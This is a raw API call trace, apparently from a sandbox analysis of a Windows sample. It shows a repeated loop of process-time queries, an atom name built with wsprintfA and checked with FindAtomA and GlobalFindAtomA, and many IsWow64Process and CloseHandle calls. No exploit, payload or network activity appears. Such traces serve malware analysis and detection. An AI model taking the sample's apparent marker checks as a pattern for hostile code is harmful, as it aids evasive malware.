	[0125.614] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0125.614] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.615] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0125.615] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.615] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0125.615] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0125.615] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0125.615] CloseHandle (hObject=0x69c) returned 1
	[0125.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0125.615] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.616] CloseHandle (hObject=0x69c) returned 1
	[0125.616] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.616] CloseHandle (hObject=0x69c) returned 1
	[0125.616] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.616] CloseHandle (hObject=0x69c) returned 1
	[0125.616] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.616] CloseHandle (hObject=0x69c) returned 1
	[0125.616] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.616] CloseHandle (hObject=0x69c) returned 1
	[0125.650] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.650] CloseHandle (hObject=0x69c) returned 1
	[0125.650] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.650] CloseHandle (hObject=0x69c) returned 1
	[0125.651] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.651] CloseHandle (hObject=0x69c) returned 1
	[0125.651] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.651] CloseHandle (hObject=0x69c) returned 1
	[0125.651] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.651] CloseHandle (hObject=0x69c) returned 1
	[0125.651] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.651] CloseHandle (hObject=0x69c) returned 1
	[0125.651] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.651] CloseHandle (hObject=0x69c) returned 1
	[0125.652] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.652] CloseHandle (hObject=0x69c) returned 1
	[0125.652] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.652] CloseHandle (hObject=0x69c) returned 1
	[0125.652] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.652] CloseHandle (hObject=0x69c) returned 1
	[0125.652] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.652] CloseHandle (hObject=0x69c) returned 1
	[0125.652] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.652] CloseHandle (hObject=0x69c) returned 1
	[0125.653] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.653] CloseHandle (hObject=0x69c) returned 1
	[0125.653] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.653] CloseHandle (hObject=0x69c) returned 1
	[0125.653] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.653] CloseHandle (hObject=0x69c) returned 1
	[0125.653] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.653] CloseHandle (hObject=0x69c) returned 1
	[0125.654] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.654] CloseHandle (hObject=0x69c) returned 1
	[0125.654] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.654] CloseHandle (hObject=0x69c) returned 1
	[0125.654] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.654] CloseHandle (hObject=0x69c) returned 1
	[0125.654] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.654] CloseHandle (hObject=0x69c) returned 1
	[0125.654] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.654] CloseHandle (hObject=0x69c) returned 1
	[0125.655] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.655] CloseHandle (hObject=0x69c) returned 1
	[0125.655] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.655] CloseHandle (hObject=0x69c) returned 1
	[0125.655] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.655] CloseHandle (hObject=0x69c) returned 1
	[0125.655] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.655] CloseHandle (hObject=0x69c) returned 1
	[0125.655] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.656] CloseHandle (hObject=0x69c) returned 1
	[0125.656] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.656] CloseHandle (hObject=0x69c) returned 1
	[0125.656] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.656] CloseHandle (hObject=0x69c) returned 1
	[0125.656] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.656] CloseHandle (hObject=0x69c) returned 1
	[0125.656] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.656] CloseHandle (hObject=0x69c) returned 1
	[0125.657] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.657] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0125.657] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0125.657] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0125.658] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.658] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0125.658] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.659] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0125.659] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0125.659] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0125.659] CloseHandle (hObject=0x69c) returned 1
	[0125.659] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0125.659] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.659] CloseHandle (hObject=0x69c) returned 1
	[0125.659] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.659] CloseHandle (hObject=0x69c) returned 1
	[0125.659] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.659] CloseHandle (hObject=0x69c) returned 1
	[0125.660] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.660] CloseHandle (hObject=0x69c) returned 1
	[0125.660] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.660] CloseHandle (hObject=0x69c) returned 1
	[0125.692] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.692] CloseHandle (hObject=0x69c) returned 1
	[0125.693] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.693] CloseHandle (hObject=0x69c) returned 1
	[0125.693] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.693] CloseHandle (hObject=0x69c) returned 1
	[0125.693] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.693] CloseHandle (hObject=0x69c) returned 1
	[0125.693] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.693] CloseHandle (hObject=0x69c) returned 1
	[0125.693] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.694] CloseHandle (hObject=0x69c) returned 1
	[0125.694] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.694] CloseHandle (hObject=0x69c) returned 1
	[0125.694] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.694] CloseHandle (hObject=0x69c) returned 1
	[0125.694] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.694] CloseHandle (hObject=0x69c) returned 1
	[0125.694] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.694] CloseHandle (hObject=0x69c) returned 1
	[0125.695] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.695] CloseHandle (hObject=0x69c) returned 1
	[0125.695] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.695] CloseHandle (hObject=0x69c) returned 1
	[0125.695] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.695] CloseHandle (hObject=0x69c) returned 1
	[0125.695] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.695] CloseHandle (hObject=0x69c) returned 1
	[0125.695] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.695] CloseHandle (hObject=0x69c) returned 1
	[0125.696] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.696] CloseHandle (hObject=0x69c) returned 1
	[0125.696] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.696] CloseHandle (hObject=0x69c) returned 1
	[0125.696] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.696] CloseHandle (hObject=0x69c) returned 1
	[0125.696] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.696] CloseHandle (hObject=0x69c) returned 1
	[0125.696] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.696] CloseHandle (hObject=0x69c) returned 1
	[0125.697] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.697] CloseHandle (hObject=0x69c) returned 1
	[0125.697] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.697] CloseHandle (hObject=0x69c) returned 1
	[0125.697] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.697] CloseHandle (hObject=0x69c) returned 1
	[0125.697] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.697] CloseHandle (hObject=0x69c) returned 1
	[0125.697] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.698] CloseHandle (hObject=0x69c) returned 1
	[0125.698] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.698] CloseHandle (hObject=0x69c) returned 1
	[0125.698] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.698] CloseHandle (hObject=0x69c) returned 1
	[0125.698] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.698] CloseHandle (hObject=0x69c) returned 1
	[0125.698] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.698] CloseHandle (hObject=0x69c) returned 1
	[0125.699] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.699] CloseHandle (hObject=0x69c) returned 1
	[0125.699] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.699] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0125.699] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0125.700] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0125.700] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.700] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0125.701] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.701] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0125.701] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0125.701] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0125.701] CloseHandle (hObject=0x69c) returned 1
	[0125.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0125.701] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.701] CloseHandle (hObject=0x69c) returned 1
	[0125.701] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.701] CloseHandle (hObject=0x69c) returned 1
	[0125.702] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.702] CloseHandle (hObject=0x69c) returned 1
	[0125.702] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.702] CloseHandle (hObject=0x69c) returned 1
	[0125.702] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.702] CloseHandle (hObject=0x69c) returned 1
	[0125.735] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.735] CloseHandle (hObject=0x69c) returned 1
	[0125.735] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.735] CloseHandle (hObject=0x69c) returned 1
	[0125.736] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.736] CloseHandle (hObject=0x69c) returned 1
	[0125.736] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.736] CloseHandle (hObject=0x69c) returned 1
	[0125.736] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.736] CloseHandle (hObject=0x69c) returned 1
	[0125.736] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.736] CloseHandle (hObject=0x69c) returned 1
	[0125.737] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.737] CloseHandle (hObject=0x69c) returned 1
	[0125.737] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.737] CloseHandle (hObject=0x69c) returned 1
	[0125.737] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.737] CloseHandle (hObject=0x69c) returned 1
	[0125.737] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.737] CloseHandle (hObject=0x69c) returned 1
	[0125.737] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.737] CloseHandle (hObject=0x69c) returned 1
	[0125.738] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.738] CloseHandle (hObject=0x69c) returned 1
	[0125.738] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.738] CloseHandle (hObject=0x69c) returned 1
	[0125.738] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.738] CloseHandle (hObject=0x69c) returned 1
	[0125.738] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.738] CloseHandle (hObject=0x69c) returned 1
	[0125.738] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.738] CloseHandle (hObject=0x69c) returned 1
	[0125.739] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.739] CloseHandle (hObject=0x69c) returned 1
	[0125.739] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.739] CloseHandle (hObject=0x69c) returned 1
	[0125.739] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.739] CloseHandle (hObject=0x69c) returned 1
	[0125.739] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.739] CloseHandle (hObject=0x69c) returned 1
	[0125.739] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.740] CloseHandle (hObject=0x69c) returned 1
	[0125.740] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.740] CloseHandle (hObject=0x69c) returned 1
	[0125.741] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.741] CloseHandle (hObject=0x69c) returned 1
	[0125.741] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.741] CloseHandle (hObject=0x69c) returned 1
	[0125.741] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.741] CloseHandle (hObject=0x69c) returned 1
	[0125.741] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.741] CloseHandle (hObject=0x69c) returned 1
	[0125.741] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.741] CloseHandle (hObject=0x69c) returned 1
	[0125.742] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.742] CloseHandle (hObject=0x69c) returned 1
	[0125.742] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.742] CloseHandle (hObject=0x69c) returned 1
	[0125.742] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.742] CloseHandle (hObject=0x69c) returned 1
	[0125.742] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.743] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0125.743] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0125.743] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0125.743] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.743] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0125.744] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.744] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0125.744] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0125.744] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0125.744] CloseHandle (hObject=0x69c) returned 1
	[0125.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0125.744] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.744] CloseHandle (hObject=0x69c) returned 1
	[0125.744] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.744] CloseHandle (hObject=0x69c) returned 1
	[0125.745] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.745] CloseHandle (hObject=0x69c) returned 1
	[0125.745] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.745] CloseHandle (hObject=0x69c) returned 1
	[0125.745] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.745] CloseHandle (hObject=0x69c) returned 1
	[0125.777] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.777] CloseHandle (hObject=0x69c) returned 1
	[0125.778] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.778] CloseHandle (hObject=0x69c) returned 1
	[0125.778] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.778] CloseHandle (hObject=0x69c) returned 1
	[0125.778] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.778] CloseHandle (hObject=0x69c) returned 1
	[0125.778] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.778] CloseHandle (hObject=0x69c) returned 1
	[0125.778] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.778] CloseHandle (hObject=0x69c) returned 1
	[0125.779] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.779] CloseHandle (hObject=0x69c) returned 1
	[0125.779] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.779] CloseHandle (hObject=0x69c) returned 1
	[0125.779] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.779] CloseHandle (hObject=0x69c) returned 1
	[0125.779] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.779] CloseHandle (hObject=0x69c) returned 1
	[0125.779] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.779] CloseHandle (hObject=0x69c) returned 1
	[0125.780] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.780] CloseHandle (hObject=0x69c) returned 1
	[0125.780] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.780] CloseHandle (hObject=0x69c) returned 1
	[0125.780] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.780] CloseHandle (hObject=0x69c) returned 1
	[0125.780] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.780] CloseHandle (hObject=0x69c) returned 1
	[0125.780] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.780] CloseHandle (hObject=0x69c) returned 1
	[0125.781] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.781] CloseHandle (hObject=0x69c) returned 1
	[0125.781] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.781] CloseHandle (hObject=0x69c) returned 1
	[0125.781] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.781] CloseHandle (hObject=0x69c) returned 1
	[0125.781] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.781] CloseHandle (hObject=0x69c) returned 1
	[0125.782] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.782] CloseHandle (hObject=0x69c) returned 1
	[0125.782] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.782] CloseHandle (hObject=0x69c) returned 1
	[0125.782] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.782] CloseHandle (hObject=0x69c) returned 1
	[0125.782] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.782] CloseHandle (hObject=0x69c) returned 1
	[0125.782] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.782] CloseHandle (hObject=0x69c) returned 1
	[0125.783] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.783] CloseHandle (hObject=0x69c) returned 1
	[0125.783] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
